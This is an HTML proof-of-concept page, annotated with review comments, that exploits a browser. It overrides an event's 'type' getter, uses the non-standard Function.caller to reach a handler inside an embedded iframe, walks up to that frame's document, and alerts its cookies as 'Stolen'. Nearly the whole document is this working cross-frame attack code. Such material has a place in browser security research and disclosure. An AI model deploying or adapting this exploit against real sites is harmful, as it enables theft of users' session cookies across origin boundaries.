<html>
<body>
<iframe src="http://localhost:8000/child.html"
width="300px" height="300px"></iframe>
<script>
// State for the proof of concept. `ev` is a synthetic 'click' event built in
// this (embedding) page; `_type` keeps its real type string so the accessor
// installed below can still return the normal value.
var ev = new CustomEvent('click');
var _type = ev.type;
// Receives the object reached from the handler's return value (see getter).
var childDoc;
// One-shot guard: the getter re-invokes its caller, which is expected to read
// `type` again, so without this flag the two would recurse.
var haveGot = false;
// Not referenced anywhere else in the visible script.
var t;
// Shadow `type` with an own accessor property on the event instance, so any
// code that reads `ev.type` executes getType() in this page's context.
// NOTE(review): presumably the reader is an event handler registered by
// child.html, which is not part of this listing; confirm against that file.
Object.defineProperty(ev, 'type', {
get: function getType() {
// Run the body only once (see `haveGot` above).
if (!haveGot) {
haveGot = true;
// `getType.caller` is the non-standard Function.prototype.caller: the function
// that invoked this getter. Engines do not expose strict-mode functions through
// it (the value is null for a strict caller), so this step depends on the
// reading function being non-strict code. It is called again with a plain
// object standing in for an event, and its return value is captured.
var tmp = getType.caller({ type: 'click' })
// Walk three parentNode links up from the returned value; the result is used
// as a document object below. The depth depends on the framed page's markup,
// which is not visible here.
childDoc = tmp.parentNode.parentNode.parentNode;
// Impact demonstration only: displays the cookie string readable through that
// object. Cookies flagged HttpOnly are never included in `document.cookie`.
alert("Stolen: " + childDoc.cookie)
}
// Always answer with the genuine type so the reader behaves normally.
return _type;
}
});
// Give the framed document time to load. This is a fixed one-second delay, not
// a load event, so the ordering is best-effort only.
setTimeout(function () {
// Take the first (and, in this page, only) iframe element.
var iframe = document.getElementsByTagName('iframe')[0];
// Borrow this window's dispatchEvent and call it with the iframe's window as
// the receiver, so listeners on that window are handed `ev`, an object that was
// created and instrumented in the embedding page.
// NOTE(review): whether the browser allows this call depends on the origin
// relationship between this page and the frame, which the listing does not
// establish.
window.dispatchEvent.call(iframe.contentWindow, ev);
}, 1000);
</script>
</body>
</html>